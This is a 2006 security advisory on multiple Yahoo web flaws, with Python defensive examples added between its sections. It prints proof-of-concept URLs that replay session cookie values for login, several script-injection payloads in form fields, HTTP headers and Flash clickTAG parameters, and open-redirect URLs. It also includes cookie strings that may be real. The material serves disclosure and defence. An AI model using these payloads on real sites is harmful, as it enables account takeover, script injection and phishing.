Yahoo Multiple Vulnerabilities (Authentication Bypass, Session Binding, Cookie
Encoding Security Weakness, Cross-Site Scripting and URL Redirection)

############################################################################

XDisclose Advisory      : XD100001
Advisory Released       : 20th June 06
Credit                  : Rajesh Sethumadhavan

Class                   : Authentication Bypass
                          Session Binding Vulnerability
                          Cookies Encoding Security Weakness
                          Cross-Site Scripting
                          URL redirection
Severity                : Medium
Solution Status         : Unpatched
Vendor                  : Yahoo
Affected applications   : Yahoo multiple web-based services

############################################################################

Overview:
Yahoo! Inc. is an American computer services company with a mission to
"be the most essential global Internet service for consumers and
businesses". It operates an Internet portal, including the popular
Yahoo! Mail. According to Web trends, Yahoo! is the most visited
website on the Internet today, with more than 400 million unique users.
The global network of Yahoo! websites received 3.4 billion page views
per day on average as of October 2005.

Various Yahoo! services are vulnerable to authentication bypass,
session binding, weak cookie encoding, cross-site scripting, file
inclusion and URL redirection vulnerabilities, which are caused by
improper validation of user-supplied input.

Description:
Multiple vulnerabilities exist in various Yahoo services.


1. Authentication Bypass and Session Binding Vulnerability.
   A malicious user can log on to Yahoo without submitting the
   username and password by constructing a malicious URL from the
   cookie values.

   The same session (URL) can be used to log in multiple times from
   multiple IP addresses, leading to a session binding vulnerability.

   POC: (UPDATED in Original Site)

--------------------------------------------------------------------------

http://msg.edit.yahoo.com/config/reset_cookies?&.y=Y=v=1%26n=0kvgvgv3qlf11
%26l=i42.j4ij/o&.t=T=sk=DAAng97eh/smzS%26d=c2wBTlRVMUFUSTFNVEl4TXpnNU5EVS0
BYQFRQUUBdGlwAVNQZHhvQgF6egF4VjFtRUJnV0E-&.done=http%3a//mail.yahoo.com

--------------------------------------------------------------------------

http://msg.edit.yahoo.com/config/reset_cookies?&.y=Y=v=1%26n=0kvgvgv3qlf11
%26l=i42.j4ij/o%26p=m2gvvind13000700&.t=T=sk=DAAng97eh/smzS%26d=c2wBTlRVMU
FUSTFNVEl4TXpnNU5EVS0BYQFRQUUBdGlwAVNQZHhvQgF6egF4VjFtRUJnV0E-&.done=http
%3a//mail.yahoo.com

--------------------------------------------------------------------------

   Where "sk" and "d" carry the session.

   Screenshot:
   http://www.xdisclose.com/Yahoo_Auth_Bypass.png
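A server-side check that closes the session-reuse hole described in item 1, as an added Python example (not Yahoo's code): a session is bound at login to the client that created it, and presenting the same token from another address revokes it and records an alert. `BoundSessionStore` and its fields are hypothetical.

```python
import hashlib
import secrets
import time

# Hypothetical server-side session store (assumption, not Yahoo's design):
# every session is bound at login to the client that created it, so a
# token copied into a URL and replayed from another machine is rejected.
class BoundSessionStore:
    def __init__(self, ttl_seconds=3600):
        self.ttl = ttl_seconds
        self._sessions = {}   # token -> {"user", "fp", "expires"}
        self.alerts = []      # replay attempts, kept for the SOC to review

    @staticmethod
    def fingerprint(client_ip, user_agent):
        # Hashed so the raw IP and User-Agent are not stored beside the token.
        return hashlib.sha256(f"{client_ip}|{user_agent}".encode()).hexdigest()

    def create(self, user, client_ip, user_agent):
        token = secrets.token_urlsafe(32)   # opaque, unpredictable session id
        self._sessions[token] = {
            "user": user,
            "fp": self.fingerprint(client_ip, user_agent),
            "expires": time.time() + self.ttl,
        }
        return token

    def resolve(self, token, client_ip, user_agent):
        """Return the user for a valid, correctly bound session, else None."""
        sess = self._sessions.get(token)
        if sess is None or sess["expires"] < time.time():
            return None
        if sess["fp"] != self.fingerprint(client_ip, user_agent):
            # Same token from a different client: treat it as a replayed or
            # stolen session, revoke it and record an alert.
            self.alerts.append({"user": sess["user"], "from_ip": client_ip})
            del self._sessions[token]
            return None
        return sess["user"]


def demo():
    """Login from one client, replay from another, original client retried."""
    store = BoundSessionStore()
    tok = store.create("sec.test", "203.0.113.10", "Mozilla/5.0")
    first = store.resolve(tok, "203.0.113.10", "Mozilla/5.0")   # "sec.test"
    replay = store.resolve(tok, "198.51.100.7", "Mozilla/5.0")  # None, revoked
    again = store.resolve(tok, "203.0.113.10", "Mozilla/5.0")   # None now
    return first, replay, again, len(store.alerts)
```

Binding to the IP address alone breaks legitimate users behind changing NAT or mobile networks; the point is that a token carried in a URL is not by itself proof of identity, and reuse from a different client is detectable.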

 

 

2. Cookie Encoding Security Weakness
   The cookie implementation in Yahoo is so weak that the cookies can
   be decoded easily. A malicious attacker can collect a lot of
   personal information from the cookies, such as year of birth, zip
   code, country and name, which can then be used to obtain the
   password through "Yahoo forgot password".

   Where
   sk & d is session
   n is password
   l is username
   p is country, year of birth, gender and more
   b is cookies created
   lg is language
   intl is international language
   iz is zipcode
   jb is industry and title

   POC Screenshot:
   http://www.xdisclose.com/Yahoo_Cookie_Encoding.png
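An added audit helper (Python, not from the advisory) that parses the cookie layout quoted in this advisory (several named cookies separated by ";", each holding "&"-separated sub-fields) and reports which of the fields listed above are readable without any key. The field meanings are taken from the list above; the sample cookie values are constructed.

```python
from urllib.parse import unquote

# Sub-field meanings exactly as listed in the advisory for the "Y" cookie.
# Any of these present in readable form is a finding: profile data should
# live server-side, keyed by an opaque session id, not in the cookie itself.
SENSITIVE_SUBFIELDS = {
    "n": "password",
    "l": "username",
    "p": "country, year of birth, gender and more",
    "iz": "zipcode",
    "jb": "industry and title",
    "lg": "language",
    "intl": "international language",
}

def parse_cookie_header(header):
    """Split 'A=k=v&k2=v2; B=...' into {cookie_name: {subkey: value}}."""
    cookies = {}
    for part in header.split(";"):
        part = part.strip()
        if not part or "=" not in part:
            continue
        name, _, body = part.partition("=")
        fields = {}
        for pair in body.split("&"):
            key, _, value = pair.partition("=")
            fields[key] = unquote(value)
        cookies[name] = fields
    return cookies

def audit_cookie(header):
    """Return (cookie, subkey, meaning, value) for every readable sensitive field."""
    findings = []
    for cname, fields in parse_cookie_header(header).items():
        for key, value in fields.items():
            if key in SENSITIVE_SUBFIELDS:
                findings.append((cname, key, SENSITIVE_SUBFIELDS[key], value))
    return findings

# Constructed sample modelled on the cookie layout quoted in this advisory;
# the values are made up, not real session or account data.
SAMPLE = ("B=example_b&b=3&s=j3; F=a=example_f&b=example_fb; "
          "Y=v=1&n=example_n&l=example_user&p=example_p"
          "&jb=example_jb&iz=00000&lg=uk&intl=uk")
```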

 

3. Cross-Site Scripting.
   This vulnerability results from the failure of the Yahoo! filtering
   engine to block certain user-supplied inputs.

   a) Yahoo Calendar Service XSS
      The flaws are due to improper sanitization of inputs passed to
      "Location", "Address", "Street" and "Phone".

      =================================================================
      This event repeats every day.
      </font><br>
      <font face="Arial" size=-1>
      <b>Event Location</b>: <script>alert('Location')</script>
      <br><b>Street</b>: <script>alert('Address')</script>
      <br><b>City, State, Zip</b>: <script>alert('Street')</script>
      <br><b>Phone</b>: <script>alert('Phone')</script>
      </font><br>
      =================================================================

      Screenshot:
      http://www.xdisclose.com/XSS_Calender_Address.png
      http://www.xdisclose.com/XSS_Calender_Phone.png
      http://www.xdisclose.com/XSS_Calender_location.png
      http://www.xdisclose.com/XSS_Calender_Street.png


   b) Yahoo Options Mail Account XSS
      The flaws are due to improper sanitization of inputs passed to
      the "Name" and "Reply to" parameters.

      =================================================================
      <tr valign="top">
      <td>Name:</td>
      <td><script>alert('Name')</script></td>
      </tr>

      <tr valign="top">
      <td>Email:</td>
      <td>sec.test@yahoo.com</td>
      </tr>
      <tr valign="top">
      <td>Reply-To:</td>
      <td><script>alert('Reply')</script>@yah.com</td>
      </tr>
      =================================================================

      Screenshot:
      http://www.xdisclose.com/XSS_Mail_Account_Name.png
      http://www.xdisclose.com/XSS_Mail_Account_Reply.png


   c) Yahoo Options Filter XSS.
      The flaws are due to improper sanitization of inputs passed to
      the "From" and "To" parameters.

      =================================================================
      <b>From</b> contains
      "<b><script>alert('From')</script>@yahoo.com</b>"
      <br>
      &nbsp;&nbsp;&nbsp;<b>To/CC</b> contains
      "<b><script>alert('To')</script>@yahoo.com</b>"
      <br>
      =================================================================

      Screenshot:
      http://www.xdisclose.com/Xss_Filter_From.png
      http://www.xdisclose.com/Xss_Filter_To.png


   d) Yahoo Ads Flash file XSS.
      The flaws are due to improper sanitization of inputs passed to
      the Flash ad files (the "clickTAG" parameter).

      Exploit:
      -----------------------------------------------------------------
      http://us.a1.yimg.com/us.yimg.com/a/ya/yahoo_answers/
      20060330_68006_asker1_sound.swf?clickTAG=javascript
      :alert('XSS%20Possiable%20in%20Yahoo%20Ads%20\n
      %20By%20Rajesh')

      http://us.a1.yimg.com/us.yimg.com/a/ya/yahoo_answers/
      20060330_68006_1_425x600_monster_morph_asker_1_check.swf?
      clickTAG=javascript:alert('XSS%20Possiable%20in%20
      Yahoo%20Ads%20\n%20By%20Rajesh')

      http://us.a1.yimg.com/us.yimg.com/i/ccs/nup/a/
      042406_68946_v1_728x90_super_nup_fun.swf?clickTAG=
      javascript:alert('XSS%20Possiable%20in%20Yahoo%20Ads
      %20\n%20By%20Rajesh')

      http://us.a1.yimg.com/us.yimg.com/i/ccs/nup/a/
      042406_68946_v1_425x600_mon_nup_mplace.swf?clickTAG=
      javascript:alert('XSS%20Possiable%20in%20Yahoo%20Ads
      %20\n%20By%20Rajesh')

      http://ad.ie.doubleclick.net/812666/specsavers_2
      for1euro_300x250.swf?clickTAG=javascript:
      alert('XSS%20Possiable%20in%20Yahoo%20Ads%20\n%20
      By%20Rajesh')

      http://us.a1.yimg.com/us.yimg.com/i/ccs/nup/a/
      042406_68946_v1_728x90_super_nup_sit.swf?clickTAG=
      javascript:alert('XSS%20Possiable%20in%20Yahoo%20Ads
      %20\n%20By%20Rajesh')

      http://us.a2.yimg.com/us.yimg.com/a/ya/yahoo_messenger/
      20051028_61760_2_425x600_mon_scarehim.swf?clickTAG=
      javascript:alert('XSS%20Possiable%20in%20Yahoo%20Ads
      %20\n%20By%20Rajesh')

      http://us.a2.yimg.com/us.yimg.com/a/ya/yahoo_mail/
      20060512_65459_1_360x100_mwa1_mail_accolades.swf?
      clickTAG=javascript:alert('XSS%20Possiable%20in%20
      Yahoo%20Ads%20\n%20By%20Rajesh')

      and more
      -----------------------------------------------------------------

      Screenshot:
      http://www.xdisclose.com/XSS_Flash_Ads.png


   e) Yahoo Mail Beta HTTP Header XSS
      The flaws are due to improper sanitization of inputs passed in
      all HTTP headers, such as Accept, Accept-Charset, Accept-Language,
      Cache-Control, Connection, Content-Length, Content-Type,
      Cookie, Keep-Alive, Pragma, SOAPAction and User-Agent, in
      Yahoo Mail Beta.

      POC :
      =================================================================
      GET :
      http://uk.f555.mail.yahoo.com/ymws?m=ListFolders&wssid=
      CKyO7/zcUU2

      Host: uk.f555.mail.yahoo.com
      User-Agent: <script>alert('User-Agent:')</script>
      Accept: text/xml,application/xml,application/xhtml+xml,text/
      html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;<script>
      alert('Accept:')</script>
      Accept-Language: en-us,en;q=0.5;<script>alert('Accept-
      Language:')</script>
      Accept-Encoding: gzip,deflate;<script>alert('Accept-
      Encoding:')</script>
      Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7;<script>alert
      ('Accept-Charset:')</script>
      Keep-Alive: 300;<script>alert('Keep-Alive:')</script>
      Connection: keep-alive;<script>alert('Connection:')</script>
      SOAPAction: urn:yahoo:ymws#ListFolders;<script>alert
      ('SOAPAction:')</script>
      Content-Length: <script>alert('Content-Length:')</script>
      Content-Type: application/xml;<script>alert('Content-
      Type:')</script>
      Cookie: B=dcnl4j129c7tu&b=3&s=j3;
      F=a=aNqy1CosvW3BmaGno6BSLOpXkP2PCglCZ3_LDJtts8oaitn
      kGkgOOjxwPKS6&b=bIpq;Y=v=1&n=0kvgvgv3qlf11&l=i42.j4ij/o&
      p=m2gvvind12000700&jb=19|24|&iz=123456
      r=g4&lg=uk&intl=uk&np=1;PH=fn=eIhKKoq4dTG7Gjr4FtHqCTA-;
      T=z=W/hlEBWF3lEBrRcLnJGLZKoMjIyBjUyNjU2NE9OMzI-&
      a=QAE&sk=DAAZ7oQuYalSuV&d=c2wBTlRVMUFUSTF
      NVEl4TXpnNU5EVS0BYQFRQUUBdGlwAVNQZHhvQgF6egFXL2hsRUJnV0E-;
      U=mt=7lM5FJ2MhYo0WJ.pqDZdpFIY1pCQZRq2Q6ftdw--&ux=W/hlEB
      &un=0kvgvgv3qlf11;YM.dpref1=sec.test%3Aspp%257C1;<script>alert
      ('Cookie:')</script>
      Pragma: no-cache;<script>alert('Pragma:')</script>
      Cache-Control: no-cache;<script>alert('Cache-Control:')
      </script>
      =================================================================

      Screenshot:
      http://www.xdisclose.com/XSS_MailBeta_Accept.png
      http://www.xdisclose.com/XSS_MailBeta_Accept-Charset.png
      http://www.xdisclose.com/XSS_MailBeta_Accept-Language.png
      http://www.xdisclose.com/XSS_MailBeta_Cache-Control.png
      http://www.xdisclose.com/XSS_MailBeta_Connection.png
      http://www.xdisclose.com/XSS_MailBeta_Content-Length.png
      http://www.xdisclose.com/XSS_MailBeta_Content-Type.png
      http://www.xdisclose.com/XSS_MailBeta_Cookie.png
      http://www.xdisclose.com/XSS_MailBeta_Keep-Alive.png
      http://www.xdisclose.com/XSS_MailBeta_Pragma.png
      http://www.xdisclose.com/XSS_MailBeta_SoapAction.png
      http://www.xdisclose.com/XSS_MailBeta_User-Agent.png


      Impact:
      Successful exploitation allows execution of arbitrary script
      code in a user's browser session in the context of the affected
      site, which may allow an attacker to steal cookie-based
      authentication credentials.
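The output-encoding fix for both the form-field cases (a to d) and the reflected-header case (e), as an added Python example rather than Yahoo's code: the vulnerable concatenation beside the hardened form that HTML-escapes every user-controlled value, with the calendar labels taken from section a. `render_event_unsafe`, `render_event_safe` and `reflect_header_safe` are illustrative names.

```python
import html

# Calendar fields the advisory names as unsanitized; their values are user input.
EVENT_FIELDS = ("Event Location", "Street", "City, State, Zip", "Phone")

def render_event_unsafe(event):
    """The vulnerable pattern: user input concatenated straight into HTML."""
    rows = [f"<b>{label}</b>: {event.get(label, '')}" for label in EVENT_FIELDS]
    return "<br>".join(rows)

def render_event_safe(event):
    """Hardened form: every user-controlled value is HTML-escaped on output,
    so <script> becomes &lt;script&gt; and quotes become entities."""
    rows = [f"<b>{label}</b>: {html.escape(event.get(label, ''), quote=True)}"
            for label in EVENT_FIELDS]
    return "<br>".join(rows)

def reflect_header_safe(name, value):
    """Request headers (User-Agent, Accept, Cookie, ...) are attacker-controlled
    too: strip CR/LF so a value cannot inject further headers, then escape."""
    clean = value.replace("\r", "").replace("\n", "")
    return f"<td>{html.escape(name)}: {html.escape(clean, quote=True)}</td>"

def contains_script(fragment):
    """Test helper: does the rendered HTML still contain a live <script tag?"""
    return "<script" in fragment.lower()
```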

 

4. URL redirection.
   This is due to a failure to filter incoming untrusted data before
   the content reaches users. This can be exploited for phishing
   attacks. The vulnerable parameters are Yahoo search web, image,
   video, preferences, cache, Yahoo Answers and more URLs containing
   /*http://yahoo.com or /**http://yahoo.com

   Exploit:

---------------------------------------------------------------------------
   http://rds.yahoo.com/_ylt=Ah0geusyaM2xEzqMAjS9XNyoA/SIG=11do5qdq6/
   EXP=1148028186/**http%3a//www.xdisclose.com

   http://search.yahoo.com/preferences/preferences?pref_done=
   http%3a//www.xdisclose.com

---------------------------------------------------------------------------

   Screenshot:
   http://www.xdisclose.com/URL_Redirection_WebSearch.png
   http://www.xdisclose.com/URL_Redirection_Images.png
   http://www.xdisclose.com/URL_Redirection_Video.png
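An added Python example (not Yahoo's code) of validating the redirect target for the two forms shown above: the `.done`/`pref_done` query parameter and the `/**http://...` path suffix. The allowlist `ALLOWED_HOSTS` is assumed for illustration.

```python
from urllib.parse import urlsplit, parse_qs, unquote

# Hosts a redirect may legitimately land on. Assumed allowlist for
# illustration; a real deployment would load its own.
ALLOWED_HOSTS = {"yahoo.com", "mail.yahoo.com", "search.yahoo.com"}
REDIRECT_PARAMS = (".done", "pref_done")

def extract_redirect_target(url):
    """Pull the redirect target out of either form the advisory shows:
    a query parameter (.done=..., pref_done=...) or a path ending in
    /*http://... or /**http://... (the rds.yahoo.com style)."""
    parts = urlsplit(url)
    query = parse_qs(parts.query, keep_blank_values=True)  # already %-decoded
    for name in REDIRECT_PARAMS:
        if name in query:
            return query[name][0]
    path = unquote(parts.path)
    for marker in ("/**", "/*"):          # longest marker first
        idx = path.find(marker)
        if idx != -1:
            return path[idx + len(marker):]
    return None

def is_safe_redirect(target):
    """Allow only http(s) URLs whose host is on the allowlist (or a subdomain
    of one), plus same-site relative paths that cannot escape the site."""
    if target is None:
        return False
    if target.startswith("/") and not target.startswith("//"):
        return True                       # "/mail/inbox" style
    parts = urlsplit(target)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False                      # rejects javascript:, data:, //evil
    host = parts.hostname.lower()
    return any(host == a or host.endswith("." + a) for a in ALLOWED_HOSTS)

def safe_redirect(url, fallback="/"):
    """Where the server should actually send the browser for a request URL."""
    target = extract_redirect_target(url)
    return target if is_safe_redirect(target) else fallback
```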

 

5. Interesting facts about Yahoo
   Yahoo Mail Inbox shows a wrong unread message count if there are
   more than 65535 unread messages.

   Screenshot:
   http://www.xdisclose.com/Yahoo_Inbox.png

Original Advisory:
http://www.xdisclose.com/XD100001.txt

Credits:
Rajesh Sethumadhavan has been credited with the discovery of these
vulnerabilities.

Disclaimer:
This entire document is strictly for educational, testing and
demonstration purposes only. Modification, use and/or publishing of this
information is entirely at your own risk. The exploit code is to be
used on your own email account. I am not liable for any direct or
indirect damages caused as a result of using the information or
demonstrations provided in any part of this advisory.